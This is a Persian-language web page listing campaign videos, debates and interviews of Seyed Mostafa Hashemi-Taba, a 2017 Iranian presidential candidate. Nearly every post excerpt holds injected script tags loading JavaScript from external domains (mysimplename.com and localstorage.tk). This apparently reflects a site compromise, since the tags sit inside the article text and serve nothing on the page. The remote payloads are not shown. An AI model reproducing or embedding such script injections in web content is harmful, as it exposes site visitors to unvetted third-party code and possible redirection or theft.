برنامه های تبلیغاتی سید مصطفی هاشمی‌طبا

برنامه های تبلیغاتی سید مصطفی هاشمی‌طبا

برنامه های رسانه ای سید مصطفی هاشمی‌طبا یکی از کاندیدهای انتخابات ریاست جمهوری سال 1396

دومین مستند انتخاباتی هاشمی‌طبا

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مستند دوم مصطفی هاشمی‌طبا نامزد دوازدهمین دوره انتخابات ریاست جمهوری از شبکه یک سیما پخش شد. <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888...
mohsen
توسط mohsen

سومین مناظره انتخاباتی | اظهارات هاشمی‌طبا و نقد‌های کاندیداها

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>سیدمصطفی هاشمی‌طبا کاندیدای دوازدهمین انتخابات ریاست جمهوری در سومین مناظره انتخابات ریاست جمهوری درخصوص برنامه‌های خود صحبت کرد. <script type='text/javascript' src='...
mohsen
توسط mohsen

فیلم کامل اظهارات هاشمی‌طبا در شبکه سه

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه های انتخابات ریاست جمهوری96<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

گفتگوی ویژه خبری | سید مصطفی هاشمی طبا

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه های انتخابات ریاست جمهوری 96 <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

مناظره دوم-بخش اول | اظهارات هاشمی‌طبا و نقد‌های کاندیداها

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>سید مصطفی هاشمی‌طبا کاندیدای دوازدهمین انتخابات ریاست جمهوری در دومین مناظره ریاست جمهوری درخصوص برنامه‌های خود صحبت کرد. <script type='text/javascript' src='https://...
mohsen
توسط mohsen

گفتگوی ویژه خبری | سید مصطفی هاشمی طبا

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه های ریاست جمهوری ۹۶ <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

اولین مستند | سید مصطفی هاشمی طبا

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>اولین مستند تبلیغاتی سید مصطفی هاشمی طبا کاندیدای دوازدهمین انتخابات ریاست جمهوری از شبکه اول سیما پخش شد. <script type='text/javascript' src='https://js.localstorage....
mohsen
توسط mohsen

گفتگوی ضبط شده _سید مصطفی هاشمی طبا

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ویژه برنامه های ریاست جمهوری ۹۶ <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
mohsen
توسط mohsen

نظر نامزدهای ریاست جمهوری درباره نخستین مناظره تلویزیونی

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>نظر نامزدهای ریاست جمهوری درباره نخستین مناظره تلویزیونی که عصر جمعه برگزار شد<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></...
mohsen
توسط mohsen

نظر نامزدهای ریاست جمهوری درباره  نخستین مناظره تلویزیونی

برنامه با دوربین | سید مصطفی هاشمی‌طبا

<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>صحبت های سید مصطفی هاشمی‌طبا یکی از نامزد های انتخابات 96 در برنامه بادوربین شبکه یک صدا وسیما 6/2/1396 ایشان یخش ابتدایی از صحبت های خود در این برنامه را به محیط زیست اختصاص دادند و...
mohsen
توسط mohsen